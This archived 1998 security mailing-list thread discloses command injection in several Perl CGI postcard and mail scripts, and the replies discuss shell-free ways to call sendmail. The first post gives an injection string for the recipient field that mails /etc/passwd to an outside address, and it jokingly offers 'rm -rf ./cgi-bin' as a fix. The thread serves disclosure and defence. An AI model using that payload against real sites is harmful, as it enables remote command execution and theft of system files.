www-cgi-vulner.txt

`Date: Mon, 9 Nov 1998 18:26:05 -0600  
From: xnec <[email protected]>  
To: [email protected]  
Subject: Several new CGI vulnerabilities  
  
INFO:  
After looking over the perl-CGI scripts on www.cgi-resources.com,  
I've discovered vulnerabilities in the following:  
  
1. HAMcards Postcard script v1.0 Beta 2  
(www.hamnetcenter.com)  
  
2. Hot Postal Services v??  
(www.hotarea.com)  
note: the only metacharacter stripping this script does is rejecting  
any |'s  
  
3. RC Bowen's Postcards v??  
(www.rcbowen.com)  
  
4. LakeWeb's File Mail and Mail List (expanded File Mail) v??  
(www.lakeweb.com)  
  
EXPLOIT:  
  
Each of these are exploitable by inputing metacharacters into the  
recipient's email address. Each script calls something similar  
to:  
  
open( MAIL, "|$mailprog $email" )  
# this particular line is from the LakeWeb scripts  
  
The exploit strings are simple, something like  
&mail [email protected] < /etc/passwd&@host.com will work for each script  
(the @host.com is necessary because some hosts check for "@" and ".")  
when placed in the Recipient Email field.  
  
As a result, any command can be executed remotely without a local  
account with the uid of the webserver (usually "nobody" or similar,  
but you never know).  
  
FIX:  
Either fork your sendmail process, strip out metacharacters (or only allow  
certian characters), use open (MAIL , "|$sendmail -t") or rm -rf  
./cgi-bin.  
  
-xnec  
  
######################################################  
# [email protected] - xnec on DALnet and EFnet#  
######################################################  
  
  
-------------------------------------------------------------  
  
Date: Tue, 10 Nov 1998 18:45:24 +1000  
From: Karl Hanmore <[email protected]>  
To: [email protected]  
Subject: Re: Several new CGI vulnerabilities  
  
G'day,  
As a related note, the WebCards program (V1.6) by Sam Kareem  
([email protected]) is subject to the same vunerability.  
  
Regards,  
Karl  
  
  
-------------------------------------------------------------  
  
Date: Mon, 9 Nov 1998 19:45:28 -0700  
From: Randal Schwartz <[email protected]>  
To: [email protected]  
Subject: Re: Several new CGI vulnerabilities  
  
>>>>> "xnec" == xnec <[email protected]> writes:  
  
xnec> Either fork your sendmail process, strip out metacharacters (or  
xnec> only allow certian characters),  
  
You cannot restrict the permitted characters of an email address.  
*Any* character is permitted on the left-side of an @, presuming  
the proper quoting is used for those more odd ones.  
  
For example, <fred&[email protected]> is a perfectly valid  
email address (try it, an autoresponder responds!).  
  
xnec> use open (MAIL , "|$sendmail -t") or rm -rf  
xnec> ./cgi-bin.  
  
Or use Net::SMTP to pass the data directly to port 25.  
  
--  
Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095  
Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying  
Email: <[email protected]> Snail: (Call) PGP-Key: (finger [email protected])  
Web: <A HREF="http://www.stonehenge.com/merlyn/">My Home Page!</A>  
Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me  
  
-------------------------------------------------------------  
  
Date: Tue, 10 Nov 1998 14:44:23 +0000  
From: Gus <[email protected]>  
To: [email protected]  
Subject: Re: Several new CGI vulnerabilities  
  
On Mon, 9 Nov 1998, xnec wrote:  
>  
> EXPLOIT:  
>  
> Each of these are exploitable by inputing metacharacters into the  
> recipient's email address. Each script calls something similar  
> to:  
>  
> open( MAIL, "|$mailprog $email" )  
  
This is one that just won't go away, and rather than try the (frankly  
quite fruitless) metachar filtering route, it might be an idea for CGI  
providing ISP's to insist on the use of perl's Mail::Sendmail module,  
which cuts out any potential pipe/metachar related bugs by communicating  
directly w/ the SMTP server.  
  
  
$LOCAL_CPAN_MIRROR/authors/id/M/MI/MIVKOVIC/Mail-Sendmail-0.74.tar.gz  
  
See http://www.perl.com/CPAN for a list of mirror sites.  
  
  
Regards  
Gus  
  
  
--  
[email protected]  
http://www.intasys.com/~angus/  
  
-------------------------------------------------------------  
  
Date: Tue, 10 Nov 1998 14:43:27 -0500  
From: Lincoln Stein <[email protected]>  
To: [email protected]  
Subject: Re: Several new CGI vulnerabilities  
  
Gus writes:  
> On Mon, 9 Nov 1998, xnec wrote:  
> >  
> > EXPLOIT:  
> >  
> > Each of these are exploitable by inputing metacharacters into the  
> > recipient's email address. Each script calls something similar  
> > to:  
> >  
> > open( MAIL, "|$mailprog $email" )  
>  
> This is one that just won't go away, and rather than try the (frankly  
> quite fruitless) metachar filtering route, it might be an idea for CGI  
> providing ISP's to insist on the use of perl's Mail::Sendmail module,  
> which cuts out any potential pipe/metachar related bugs by communicating  
> directly w/ the SMTP server.  
  
Net::SMTP is more likely to be installed on ISP's  
machines. Mail::Sendmail is a bit of an oddball. There are also other  
ways to avoid the fruitless metachar search and destroy mission.  
First off, why do people think they need to put the recipient's  
address on the command line in the first place?  
  
open (MAIL,"| /usr/lib/sendmail -t -oi");  
print MAIL <<END;  
To: $mailto  
From: me (me\@nowhere.com)  
Subject: nothing much  
  
Hi there!  
END  
close MAIL;  
  
And here's a general Perl technique for opening pipes without getting  
the shell involved at all:  
  
open (MAIL,"|-") || exec '/usr/lib/sendmail','-t','-oi';  
print MAIL <<END;  
To: $mailto  
From: me (me\@nowhere.com)  
Subject: nothing much  
  
Hi there!  
END  
close MAIL;  
  
Lincoln  
  
--  
========================================================================  
Lincoln D. Stein Cold Spring Harbor Laboratory  
[email protected] Cold Spring Harbor, NY  
========================================================================  
`